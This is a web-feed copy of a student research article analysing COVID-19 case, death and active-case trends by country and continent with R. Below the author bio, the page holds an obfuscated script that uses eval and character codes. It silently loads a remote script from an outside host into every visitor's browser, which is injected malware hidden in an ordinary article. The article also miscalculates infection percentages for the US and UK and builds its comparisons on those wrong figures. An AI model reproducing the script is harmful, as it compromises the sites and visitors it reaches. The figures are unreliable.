<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="835" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-6-1024x835.png" alt="" class="wp-image-834" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-1024x835.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-300x244.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-768x626.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-830x676.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-230x187.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-350x285.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6-480x391.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-6.png 1070w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">The sudden rise of death rate around April seems unexpected. However the total confirmed cases also began to grow rapidly around April as seen in the last graph. The reason for the spike in death rate is most likely due to the overflow of COVID-19 patients in hospitals. Without enough medical supplies or facilities, there would have been many people with the disease not getting adequate care. Because of this, the amount of deaths compared to the number of cases would have gone up, which increases the death rate.&nbsp;</p>



<p class="wp-block-paragraph">The rise in death rate is also seen in the cumulative deaths over time. The deaths begin to grow more rapidly after April which mirrors the behavior of the death rate graph to a certain extent. After May the death rate seems to hit its peak around 7% and begins to slowly drop down to the predicted 2-3% death rate. This is probably due to the increased political activity of some nations to further understand the virus and develop better treatment patterns. In addition, many more medical facilities were created which would have helped with the overcrowding in the hospitals.&nbsp;</p>



<p class="wp-block-paragraph">Even though the death rate has dropped to reach the 2-3% predicted death rate, the deaths continue to grow and have begun to grow at a larger rate around November 2020. This is due to the increasing number of confirmed case. Even if the death rate sits at something as low at 2%, the exponentially increasing number of confirmed cases will still continue to have an impact on the number of deaths.&nbsp;</p>



<p class="wp-block-paragraph">As seen before, there have been changes in the rate that the cases grow. These are seen in the graphs where the slope of the line seems to change. For example, the confirmed cases seems to have a change in rate beginning in April, a change before June, and one later in October. As stated before, the change in rate in April was most likely due to the rapid spread of the virus from the small number of people that were not contained. Later in June, the change in rate is likely due to people wanting to enjoy a summer vacation. One change in rate that has not been touched on is the change in October.&nbsp;</p>



<p class="wp-block-paragraph">The confirmed case graph changes to become a much steeper line than before and the active cases seem to mimic its activity, but with a more noticeable increase in rate. Back during the early months of the virus, news suggested that the virus would tone down and spread would be smaller in the summer. Ironically, this seems to be wrong as the rate increases when heading into the summer months. However, the main point that the news stressed was that the virus could rebound during the winter due to colder temperature. This seems to be the explanation for the increase in rate for confirmed COVID-19 cases.&nbsp;</p>



<p class="wp-block-paragraph">Moving on, the daily case count can also be analyzed to have a deeper understand of the data. We begin by looking at the new confirmed cases for each date. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="866" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-7-1024x866.png" alt="" class="wp-image-835" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-1024x866.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-300x254.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-768x650.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-830x702.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-230x195.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-350x296.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7-480x406.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-7.png 1038w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">The graph for this looks wild with the confirmed cases jumping up and down over and over again. However this is due to some countries such as Botswana, only reporting cases every couple of days. Other countries also have widely varying values over a couple of days. This might be due to the speed of communication between certain parts of the country or other outside factors preventing every medical center from reporting data on a daily basis.&nbsp;</p>



<p class="wp-block-paragraph">What is worrying, is the massive spike before January that does not fit the trend whatsoever. More specifically, this is on December 10, 2020. Upon closer inspection, it appears to be an observation of Turkey that records over 800,000 confirmed cases on that day. This completely contrasts the other data in adjacent dates that hover around 30,000. Furthermore, there appears to be another observation from Turkey a little later that reports over 1,000,000 recoveries in one day. This is absurd, albeit good, if the data is correct. However ignoring data points like this will help make our graph clearer. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="845" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-8-1024x845.png" alt="" class="wp-image-836" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-1024x845.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-300x248.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-768x634.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-830x685.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-230x190.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-350x289.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8-480x396.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-8.png 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">In this graph, the line seems to be taking ”steps” where there are steeper portions and flatter portions. For example, the graph is flat up until a little before April. Before April, the graph takes a ”step” as the number of daily confirmed cases increases a lot. However afterwards, the graph become relatively flat. Then before July, the graph once again takes a step. This time, the step appears to be more gradual and plateaus around 250,000 cases daily. Then there appears to be a massive step after October which brings the average confirmed cases daily to over 500,000. Notice that the steps occur at nearly the same time frame as the increases in rates for cumulative cases. This suggests that the steps in the daily confirmed cases cause the change in rate for the cumulative cases.</p>



<p class="wp-block-paragraph">Furthermore, it appears that the oscillation in the graph appears very small when starting out, but grows very large towards the beginning of 2021 where it has a change in over 125,000 every time it jumps from low to high. This is most likely just a result of the increasing number of cases. Since cases increase, there will be a larger number of cases that graph changes by when adding the data that is not updated daily. </p>



<h4 class="wp-block-heading">3.2 Grouping countries based on similar factors&nbsp;</h4>



<p class="wp-block-paragraph">Grouping countries together can uncover some trends that cannot be seen when looking at all the data cumulatively. First grouping the top 5 countries with the highest case count. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="837" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-9-1024x837.png" alt="" class="wp-image-837" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-1024x837.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-300x245.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-768x628.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-830x679.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-230x188.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-350x286.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9-480x392.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-9.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">There appears to be a very large difference between the country with the highest cases and the other 4 countries. The gap is so large, that it seems like the total cases of all the other 4 countries could sum to the amount of cases the top country has. Unfortunately, it is the US that has the greatest number of confirmed COVID-19 cases. The graph suggests that it is greater than 25 million as of February 2021.&nbsp;</p>



<p class="wp-block-paragraph">The lines themselves also tell a story. For example, the line representing the US is the steepest and the steepness seems to begin after October. This lines up with the global data. However it is hard to tell if the US is following the global trend, or if it is creating the global trend.&nbsp;</p>



<p class="wp-block-paragraph">Taking a look at the second highest case country, India, we find a much more mellow graph. The growth of cases in India around August 2020 seem to have approached a growth similar to the US’s in late 2020. However, the growth seems to have reduced and a peak of the curve seems to be emerging. The rest of the countries seem to still be growing in case numbers without having reached their peaks.</p>



<p class="wp-block-paragraph">Another fact that is not promising for the US is the ratio of cases to total population compared to other countries. The population of the US is about 330 million and the total cases is above 25 million. This means that around 13% of the total population has been infected by the virus. Compare this to India which is considered to be worse off medically and economically in some parts than the US. India’s population is over 1 billion people, yet their total confirmed cases is just above 10 million. This is about 1% of their population.&nbsp;</p>



<p class="wp-block-paragraph">The US, with nearly 3 times the land mass of India has over 10 times the percentage of their population infected with COVID-19. India being a very crowded and even poor country, seems to have done much better than the US when facing this pandemic. The question become why this is the case.&nbsp;</p>



<p class="wp-block-paragraph">Perhaps the data is rather inaccurate compared to the US because of lack of testing centers in the India compared to the US. Instead, we might look towards a more ”trustworthy” nation such as the UK and compare it to the US. The population of the UK is around 67 million and the total confirmed cases is about 4 million. This means about 17% of the population has been infected by COVID-19.&nbsp;</p>



<p class="wp-block-paragraph">The idea that the US has been doing terrible with COVID seems to be rather weak. Other countries such as the UK seem to be doing about the same, or even a little worse.&nbsp;</p>



<p class="wp-block-paragraph">Looking at the current active cases can reveal some more information.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="998" height="862" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-10.png" alt="" class="wp-image-838" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-10.png 998w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-10-300x259.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-10-768x663.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-10-830x717.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-10-230x199.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-10-350x302.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-10-480x415.png 480w" sizes="(max-width: 998px) 100vw, 998px" /></figure>



<p class="wp-block-paragraph">It appears that the US has nearly 20 million active cases as of February 2021. This translates to about 4/5 of the total cases being active cases. Similarly, the UK has around 3.5 million active cases. Comparing this to the total cases the UK has results in around 7/8 of the total cases being active. This is by no means good, but it stands out very much compared to other countries such as India, who seem to have hit their peak cases before October 2020.&nbsp;</p>



<p class="wp-block-paragraph">The difference in Active case count suggest that the results of the other countries could possibly be inaccurate from reality due to logistical problems or other factors tying into the collection of the data.&nbsp;</p>



<h4 class="wp-block-heading">3.3 Comparing cases between continents&nbsp;</h4>



<p class="wp-block-paragraph">When dividing the data into groups that share similar factors, the idea of global region comes to mind. A general grouping based on the latitude and longitude values in the data help group the countries by continent.&nbsp;</p>



<p class="wp-block-paragraph">To get a general idea of the data, we can try plotting the total confirmed cases over time for a specific continent, in this case, Europe. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="851" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-11-1024x851.png" alt="" class="wp-image-839" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-1024x851.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-300x249.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-768x638.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-830x690.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-230x191.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-350x291.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11-480x399.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-11.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Starting around April 2020, a split appears in the graph. A few countries begin to experience a sizable increase in total cases, while the rest of the countries seem to stay on a slower rate of increase. One could infer that the countries that have a greater increase were more connected with the rest of the world and therefore the cases increased as the whole world began to get infected.&nbsp;</p>



<p class="wp-block-paragraph">The graph seems to stay rather constant until October 2020 which suggests that the governments were able to contain the virus and quarantine those who were infected. Once Autumn hits, the cases begin to grow rapidly for those who felt a larger initial increase, but the more ”dormant” countries still experience some change in the growth rate. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="853" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-12-1024x853.png" alt="" class="wp-image-840" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-1024x853.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-300x250.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-768x640.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-830x691.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-230x192.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-350x292.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12-480x400.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-12.png 1066w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">The average cases over time in Europe seem to reflect the graph of all the countries rather well. The increase in cases around April 2020 seems to have the same curve and the increase in October matches the previous graph rather well.&nbsp;</p>



<p class="wp-block-paragraph">Taking a look at Asia might reveal some similarities between the continents.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="849" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-13-1024x849.png" alt="" class="wp-image-841" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-1024x849.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-300x249.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-768x637.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-830x688.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-230x191.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-350x290.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13-480x398.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-13.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">First of all, the line that skews most of the graph is India. In order to have a better understanding of the Asian countries, filtering out India is a must.&nbsp;</p>



<p class="wp-block-paragraph">The country that has cases way before April 2020 is China, the country where the virus originated. The cases seem to grow very rapidly at the start, but they seem to have stabilized the condition very quickly. This may be due to the power of the Chinese government that keeps people quarantined and safe even if people try to resist. In other places such as the US, the government has been more lenient with the COVID-19 policies which have cause people to actively spread the virus on their own.&nbsp;</p>



<p class="wp-block-paragraph">Interestingly, the cases in Asia seem to begin a month or two after April 2020. This is contrasting the growth in cases that happened around early April 2020 in Europe. The cases also do not seem to grow as drastically when transitioning into October 2020 in Asia as they had in Europe.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="847" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-14-1024x847.png" alt="" class="wp-image-842" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-1024x847.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-300x248.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-768x635.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-830x686.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-230x190.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-350x289.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14-480x397.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-14.png 1050w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Including the country India almost quadruples the average for the continent so removing India helps in more accurately representing the rest of the countries. The most noticeable part of the graph is how linear is compared to the average for Europe and even the average with India. This suggests steady growth over time for the cases in Asia. Perhaps not enough government action has been taken, but the population, or the population density, or some other factor is keeping the rate of increase low. However if the graph was linear like this and very steep such as the graph towards the end of 2020 for Europe, a problem would appear. This begins to shine light on how such factors such as government support or population density can affect how the virus spread.</p>



<p class="wp-block-paragraph">If we isolate the countries with the most cases, we get this graph, once again removing India. It appears that Indonesia and Iran have the most confirmed cases. The rest of the countries seem to be clustered around two points as of January 2021. One group of countries sits around 500,000 cases, where the other group seems to be around 250,000 cases. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="859" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-15-1024x859.png" alt="" class="wp-image-843" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-1024x859.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-300x252.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-768x644.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-830x696.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-230x193.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-350x293.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15-480x402.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-15.png 1040w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Moving onto Africa, the graph seems very similar to the one of Asia with a couple outliers.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="836" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-16-1024x836.png" alt="" class="wp-image-844" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-1024x836.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-300x245.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-768x627.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-830x678.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-230x188.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-350x286.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16-480x392.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-16.png 1068w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">The graph’s trends seem to align with what has been found before, but the timing of the growth seems to be shifted later. The first initial growth seems to begin around mid-May 2020 compared to early April 2020 in more ”connected” countries. For most of the countries, the growth seems to be very slow and gradual, but for some, the growth changes or grows at a very rapid rate.&nbsp;</p>



<p class="wp-block-paragraph">Once isolating the countries with the most cases, one country that stands out. South Africa appears to have the ”steps” pattern in its graph where all the other countries are not as similar to the ”steps” pattern. In addition, it has around double the cases of the other countries. This seems strange since South Africa seems to be similar to the other countries regarding economy and other factors. The most probable reason for South Africa’s case count would be its business and people going to South Africa for business compared to other countries whose economy runs on other factors. In addition, there is always the possibility of inaccurate data collection in African countries and South Africa might be the country that has collected COVID-19 data the best. Therefore South Africa would have higher total case counts.&nbsp;</p>



<h2 class="wp-block-heading"><strong>4 </strong>Statement of Limitations&nbsp;</h2>



<h4 class="wp-block-heading"><strong>4.1 Alternatives&nbsp;</strong></h4>



<p class="wp-block-paragraph">Other ways to approach the data analysis would be to focus on specific countries individually then compare them after each country was analyzed. This would provide a much more thorough analysis of the data and help understand how each country went through the pandemic.&nbsp;</p>



<p class="wp-block-paragraph">In addition, this study focused more on the total confirmed cases over time and how the values for that changed. The data used also allowed more analysis into total deaths, recoveries, or death rates that were not focused on in this paper. When analyzing death rates and deaths, one could understand more about the health care systems and compare how well COVID-19 was treated, compared to how it spread.&nbsp;</p>



<h4 class="wp-block-heading">4.2 Weaknesses&nbsp;</h4>



<p class="wp-block-paragraph">A large weakness came with the data itself. Governments might not be able to collect all the data accurately. Even though the data was collected from a trusted source, John Hopkins University, the data that the countries released may have been flawed. One instance of this could be seen in the mistake in the data for Turkey with over 1 million recoveries in one day. Governments either have falsified data or simply cannot measure data regularly enough. This could be seen in the daily cases graph which became jagged.&nbsp;</p>



<p class="wp-block-paragraph">The thorough analysis of the data going by every country would be very weak to the inconsistent data. Many countries have inconsistent data and thoroughly analyzing them all would be inefficient and ineffective. Perhaps a blend of thorough analysis on specific countries and a global approach would have been the best way to work with the data. A next step would be the analysis of death rates and deaths for countries would bring very valuable insight to the study. However the death rates and deaths more shine light on the treatment and effectiveness of the treatment of COVID-19 rather than the spread itself which was the main focus of this research paper.&nbsp;</p>



<h4 class="wp-block-heading">4.3 Challenges&nbsp;</h4>



<p class="wp-block-paragraph">Working with the dataset was rather challenging. The data itself came with some flaws such as incomplete data, or outliers that skewed the data. This was difficult to work through and questioned the validity of the rest of the data. Some outliers could exists for individual countries, but would not be seen without checking the graph of each country independently.&nbsp;</p>



<p class="wp-block-paragraph">On a more personal scale, fully understanding and working with the data was new and posed many challenges of getting the code itself to run.&nbsp;</p>



<h2 class="wp-block-heading">5 Conclusion&nbsp;</h2>



<h4 class="wp-block-heading">5.1 Discoveries&nbsp;</h4>



<p class="wp-block-paragraph">There seems to be very distinct trends in the graph across the data. For example the trend in the early growth of cases in April. Some countries had this portion of the graph shifted earlier or later. It is interesting to understand that different countries get infected at different times due to the kinds of connections the country has with the world. Even though the growth started at different times, the general trend of sharp growth followed by a plateau in the cases shows that the virus always seems to take the same course when spreading.&nbsp;</p>



<p class="wp-block-paragraph">In addition, the second ”wave” of COVID-19 also appeared dominant in countries that were considered first-world or better off than others. Surprisingly, they were the ones that experienced the second ”wave” and the third world countries did not experience this second ”wave” of cases.&nbsp;</p>



<p class="wp-block-paragraph">The difference between cases for countries and general trends seems to stay consistent throughout the data. This suggests that the virus still has similar impacts regardless of how developed a country is. Perhaps it does not matter how developed or wealthy the country is, but rather the effectiveness of the government and people to combat the virus together.&nbsp;</p>



<p class="wp-block-paragraph">Another thing that stands out is how some more authoritarian governments handled the virus better than more democratic governments. Sometimes governments have to take action to do what is better for the people, even if the people themselves do not want to. The freedom that comes with democratic governments has its downsides that allow the people to do what they wish, sometimes at the expense of others. Governments sometimes need to be able to enforce their laws to protect the lives of their people, but it also needs to come with balance to prevent the exploitation of the people.&nbsp;</p>



<h4 class="wp-block-heading">5.2 Significance&nbsp;</h4>



<p class="wp-block-paragraph">Many trends have popped up when analyzing the data, some of the most prominent ones are the growth starting around April 2020, and the increase in rate around October 2020 when moving into Autumn. The increase in growth in April was most likely due to the spread of the virus to all the other countries through business and travel. Even though the virus was discovered in late December 2019, the growth still hit many countries almost 6 months later.&nbsp;</p>



<p class="wp-block-paragraph">The question then becomes when is a good time to quarantine society and prevent the spread of the virus? Because many countries would not want to shut down their economy and let other countries get an upper hand in trade and other things. Perhaps it is the selfish nature of humans to keep airlines open and allow the virus to spread freely, only taking action when people lose their lives. The increase in rate around April is most likely due to the lack of government action to prevent the spread of the virus. To prevent this in the future, governments should take action quickly and effectively.&nbsp;</p>



<p class="wp-block-paragraph">The growth starting later in October can be explained with the colder weathers which create a better environment for the virus to thrive. Some of the increase in cases could also be attributed to people relaxing their stay-at-home procedures or others becoming desperate to support themselves financially.&nbsp;</p>



<p class="wp-block-paragraph">Addressing the first point, people will become bored and look to find relief from the dull quarantine. This however, should be prevented because it seems to be the least meaningful way to cause the spread of the virus. Not out of necessity, but out of boredom or other feelings, people will risk their lives and the lives of others to help themselves. Government action may have a role in this. Where you see more powerful governments, people are forced to stay at home or be arrested. Whether or not this goes against human right, it certainly is effective. In countries such as China, measures were put into place to limit the amount of people going outside and such. It seems to be effective because, even though China was the origin of the virus, they have limited the spread and have almost returned to normal life by 2021.&nbsp;</p>



<p class="wp-block-paragraph">The issue of financial aid and other factors that force people to go outside and spread the disease can also be looked at. In the US, every person wants to get their money from others to survive, otherwise they themselves cannot afford to quarantine at home. These actions can be seen in landlords evicting people because they cannot pay their rent. The evictions benefit no one and only further the spread of the virus. Government action and financial aid can help, but that is beyond the scope of the research paper. The economics behind the situation cannot be analyzed in this paper.&nbsp;</p>



<h4 class="wp-block-heading">5.3 Contributions&nbsp;</h4>



<p class="wp-block-paragraph">Thank you to Dr. Peter Kempthorne for being my mentor for this project. This project was actually my first real project in Statistics and using the Language R. I came into this project with some beginner knowledge in other coding languages, but none of them I had used in the way I used R. However after some perseverance, I learned how to generally work with R functions and create data that is useful.</p>



<p class="wp-block-paragraph">Outside of R, I also learned a lot about statistical thinking in general. While&nbsp;working on this project under a mentor, I was able to understand more of the thought process of how to represent data well, and even new ways to use the data to predict things in the future. Unfortunately, I was not able to incorporate those aspects of my learning into this research paper.</p>



<h4 class="wp-block-heading">5.4 Citations</h4>



<p class="wp-block-paragraph">Soetewey, Antoine. “Top 5 R Resources on COVID-19 Coronavirus.” Medium, Towards Data Science, 10 Jan. 2021, towardsdatascience.com/top-5-r-resources-on-covid-19-coronavirus-1d4c8df6d85f.</p>



<p class="wp-block-paragraph">Krispin, Rami. “RamiKrispin/coronavirus_dashboard.” GitHub, 2020, github.com/RamiKrispin/coronavirus_dashboard.&nbsp;</p>



<p class="wp-block-paragraph"></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Leison Gao</h5>
<p class="no_indent" style="margin:0;">Leison is a sophomore at the Los Gatos High School. </p></figure></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/what-does-covid-19-tell-us/">What Does COVID-19 Tell Us?</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
